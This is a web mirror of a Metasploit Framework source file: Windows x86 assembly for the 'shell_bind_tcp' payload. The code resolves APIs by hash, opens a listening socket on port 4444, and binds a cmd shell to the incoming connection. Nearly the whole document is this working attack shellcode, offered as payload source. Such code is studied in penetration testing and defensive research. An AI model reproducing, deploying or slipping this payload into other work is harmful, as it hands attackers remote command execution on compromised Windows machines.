CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/shellcode/windows/single_shell_bind_tcp.asm
Views: 11779
1
;

2
; Metasploit Framework

3
; http://www.metasploit.com

4
;

5
; Source for shell_bind_tcp (single)

6
;

7
; Authors: vlad902 <vlad902@gmail.com>

8
; Size   : 317

9
;

10


11
cld

12
push byte -0x15

13
dec ebp

14
call 0x2

15
pusha

16
mov ebp,[esp+0x24]

17
mov eax,[ebp+0x3c]

18
mov edi,[ebp+eax+0x78]

19
add edi,ebp

20
mov ecx,[edi+0x18]

21
mov ebx,[edi+0x20]

22
add ebx,ebp

23
dec ecx

24
mov esi,[ebx+ecx*4]

25
add esi,ebp

26
xor eax,eax

27
cdq

28
lodsb

29
test al,al

30
jz 0x34

31
ror edx,0xd

32
add edx,eax

33
jmp short 0x28

34
cmp edx,[esp+0x28]

35
jnz 0x1f

36
mov ebx,[edi+0x24]

37
add ebx,ebp

38
mov cx,[ebx+ecx*2]

39
mov ebx,[edi+0x1c]

40
add ebx,ebp

41
add ebp,[ebx+ecx*4]

42
mov [esp+0x1c],ebp

43
popa

44
ret

45
xor ebx,ebx

46
mov eax,[fs:ebx+0x30]

47
mov eax,[eax+0xc]

48
mov esi,[eax+0x1c]

49
lodsd

50
mov eax,[eax+0x8]

51
pop esi

52
push dword 0xec0e4e8e

53
push eax

54
call esi

55
push bx

56
push word 0x3233

57
push dword 0x5f327377

58
push esp

59
call eax

60
push dword 0x3bfcedcb

61
push eax

62
call esi

63
pop edi

64
mov ebp,esp

65
sub bp,0x208

66
push ebp

67
push byte +0x2

68
call eax

69
push dword 0xadf509d9

70
push edi

71
call esi

72
push ebx

73
push ebx

74
push ebx

75
push ebx

76
push ebx

77
inc ebx

78
push ebx

79
inc ebx

80
push ebx

81
call eax

82
push word 0x5c11

83
push bx

84
mov ecx,esp

85
xchg eax,ebp

86
push dword 0xc7701aa4

87
push edi

88
call esi

89
push byte +0x10

90
push ecx

91
push ebp

92
call eax

93
push dword 0xe92eada4

94
push edi

95
call esi

96
push ebx

97
push ebp

98
call eax

99
push dword 0x498649e5

100
push edi

101
call esi

102
push eax

103
push esp

104
push esp

105
push ebp

106
call eax

107
xchg eax,ebx

108
push dword 0x79c679e7

109
push edi

110
call esi

111
push ebp

112
call eax

113
o16 push byte +0x64

114
push word 0x6d63

115
mov ebp,esp

116
push byte +0x50

117
pop ecx

118
sub esp,ecx

119
mov edi,esp

120
push byte +0x44

121
mov edx,esp

122
xor eax,eax

123
rep stosb

124
inc byte [edx+0x2d]

125
inc byte [edx+0x2c]

126
xchg eax,ebx

127
lea edi,[edx+0x38]

128
stosd

129
stosd

130
stosd

131
push dword 0x16b3fe72

132
push dword [ebp+0x44]

133
call esi

134
pop ebx

135
push edi

136
push edx

137
push ecx

138
push ecx

139
push ecx

140
push byte +0x1

141
push ecx

142
push ecx

143
push ebp

144
push ecx

145
call eax

146
push dword 0xce05d9ad

147
push ebx

148
call esi

149
push byte -0x1

150
push dword [edi]

151
call eax

152
mov edx,[edi-0x4]

153
add esp,byte +0x64

154
call esi

155
push edx

156
call eax

157
push dword 0x5f048af0

158
push ebx

159
call esi

160
call eax

161


162